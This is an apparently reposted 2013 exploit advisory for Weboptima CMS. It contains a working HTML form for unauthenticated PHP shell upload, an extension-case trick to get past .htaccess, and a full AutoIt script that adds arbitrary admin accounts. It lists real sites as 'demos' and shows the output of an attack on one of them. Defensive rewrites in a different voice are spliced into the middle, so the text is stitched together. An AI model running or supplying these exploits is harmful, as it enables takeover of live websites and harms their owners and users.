Friday 19 April 2013

Joomla (Weboptima shell upload vuln)


#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm AkaStep member from Inj3ct0r Team                  1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

weboptima_cms_remote_add_admin_shell_upload.au3
Video: http://www.youtube.com/watch?v=2Cm9hNR3dNc&feature=youtu.be
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both exploits are available: an HTML exploit to upload a shell
and an AutoIt exploit to add arbitrary admin accounts to the target site.
More details below.
============================================

Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/

============================================
About Vulns:

1st vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD A SHELL.
Vulnerable code:

//cms/upload.php
=============SNIP BEGINS======================
<?php
$path = "../uploades";
if (!file_exists($path))
{
    mkdir($path, 0777);
}

if (isset($_GET['name']))
{
    unlink($path . "/" . $_GET['name']);
    $letter = $_GET['letter'];
    $selTypey = $_GET['selType'];
    header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
<div align="center">
<table align="center">
<tr>
    <td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>
</tr>
<tr>
<td>
<?php
if (isset($_POST['sub']))
{
    $fileName = $_FILES["up_file"]['name'];
    $masSimbl = array('&', '%', '#');
    if (in_array($fileName[0], $masSimbl))
    {
        echo $fileName[0] . ' սիմվոլով սկսվող անուն չընտրել';
    }
    else
    {
        move_uploaded_file($_FILES["up_file"]['tmp_name'], "$path/" . $_FILES["up_file"]['name']);
    }
}
?>
========================SNIP ENDS=================




Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file"   name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>

After a successful upload the shell can be found at: http://site.tld/uploades/shellname.php

NOTE: There may be a simple .htaccess that prevents you from accessing the shell (HTTP 403).
This is not a problem; just upload your shell with a mixed-case extension like:

myshell.PhP
or
myshell.pHp

OWNED.
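What the upload handler above gets wrong is worth spelling out from the defender's side: it runs for any visitor (no session check), it stores the file under the client-supplied name with only a check on the first character, and the directory's .htaccess apparently matches the extension case-sensitively, which is why the `.PhP` trick above works. The following hardened rewrite is an added example, not Weboptima's code. It assumes the session flag `status_shoping_adm` / `adm_shop` that the page's own `cms/loginPass.php` checks; the extension and MIME allowlists and the `safe_upload_name()` helper are our choices.

```php
<?php
// Hardened cms/upload.php (added example, not the vendor's code).
// Assumption: 'status_shoping_adm' === 'adm_shop' marks a logged-in admin,
// as in the loginPass.php snippet on this page. Allowlists below are ours.
session_start();

// 1. Gate the whole script. header() does not stop execution, so exit.
if (!isset($_SESSION['status_shoping_adm'])
    || $_SESSION['status_shoping_adm'] !== 'adm_shop') {
    header('Location: index.php');
    exit;
}

$path = '../uploades';            // same directory the original uses
if (!is_dir($path)) {
    mkdir($path, 0750, true);     // not world-writable
}

// 2. Extensions we are willing to store. Compared after lowercasing, so
//    .PhP and .pHp are rejected exactly like .php.
$allowedExt  = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
$allowedMime = ['image/jpeg', 'image/png', 'image/gif', 'application/pdf'];

/**
 * Returns a server-chosen on-disk name for an upload, or null if the
 * client-supplied name must be refused. The client name is never reused.
 */
function safe_upload_name(string $clientName, array $allowedExt): ?string
{
    $base = basename($clientName);                       // drop any path
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowedExt, true)) {
        return null;
    }
    // Random name: no user-controlled dots, spaces or symbols on disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// 3. Delete branch: behind the same gate, and confined to $path.
if (isset($_GET['name'])) {
    $target = $path . '/' . basename($_GET['name']);
    if (is_file($target)) {
        unlink($target);
    }
    header('Location: upload.php');
    exit;
}

// 4. Upload branch: check the bytes, not only the name.
if (isset($_POST['sub'], $_FILES['up_file'])) {
    $f = $_FILES['up_file'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        exit('Upload failed');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    $name = safe_upload_name($f['name'], $allowedExt);
    if ($name === null || !in_array($mime, $allowedMime, true)) {
        http_response_code(415);
        exit('File type not allowed');
    }
    if (!move_uploaded_file($f['tmp_name'], "$path/$name")) {
        http_response_code(500);
        exit('Could not store file');
    }
    echo 'Stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}
```

Two points on the design: the extension check is only one layer, so the upload directory should also have PHP execution switched off outright (for Apache, `php_flag engine off` or a `SetHandler` override in that directory) rather than relying on a filename pattern, and if a pattern is used it must be case-insensitive, because the 403 rule the advisory bypasses was clearly not. Storing uploads under a random server-chosen name also removes the whole class of "what does the web server do with this odd filename" questions.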



2nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO THE TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit; *the script continues its execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");

$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============
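The defect is the missing `exit` after `header("Location: index.php")`: PHP only queues the redirect header and then keeps running the rest of the file, so a client that simply ignores the 302 (as the AutoIt exploit below does) gets the add-admin code executed with its POST data. The corrected gate is an added example, not Weboptima's code; the session flag name is the one the snippet above checks, and `require_admin()` is our own helper.

```php
<?php
// Corrected head of cms/loginPass.php (added example, not the vendor's code).
// Assumption: 'status_shoping_adm' === 'adm_shop' is the admin session flag,
// as in the vulnerable snippet on this page.
session_start();

/**
 * Redirects anyone who is not an admin and STOPS the script.
 * header() alone is not a control: without exit, everything after it
 * still runs for the unauthenticated request.
 */
function require_admin(): void
{
    if (!isset($_SESSION['status_shoping_adm'])
        || $_SESSION['status_shoping_adm'] !== 'adm_shop') {
        header('Location: index.php', true, 302);
        exit;                      // the line the original is missing
    }
}

require_admin();

// Only now is it safe to load the database layer and act on POST data.
require_once '../myClass/DatabaseManeger.php';
require_once '../myClass/function.php';

$_POST = stripSlash($_POST);
$_GET  = stripSlash($_GET);

// State-changing actions should additionally require POST and a per-session
// anti-CSRF token; a Referer check (which the exploit output below hints
// at) is not a substitute, since clients choose what Referer to send.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit;
}
// ... the rest of loginPass.php (add/update admin) continues here
```

A quick grep for `header(` calls that are not followed by `exit`/`die` is the cheapest way to find this pattern across a PHP code base, and every hit that guards an authorization decision is a finding.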

And here is an exploit written in AutoIt that exploits
this vulnerability and adds an admin to the target site.


Exploit usage(CLI):

weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere


##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld  username  password
[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]
[@@@]           Vuln & Exploit By AkaStep               [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Yaaaaa We are Going To Travel xD           [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
   OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################


#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
@CRLF & "[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
'[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';

;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if  $CmdLine[0] <> 3 Then
MsgBox(64,"",$msg_usage);
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf


HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));



HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password &  $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD           [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
'   OTHERWISE YOU WILL UNABLE TO LOGIN!   ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*]  May be you are Lucky;)                   [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
    $sHeader = _WinHttpQueryHeaders($hRequest)
    Do
        $sReturned &= _WinHttpReadData($hRequest)
    Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;

Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs
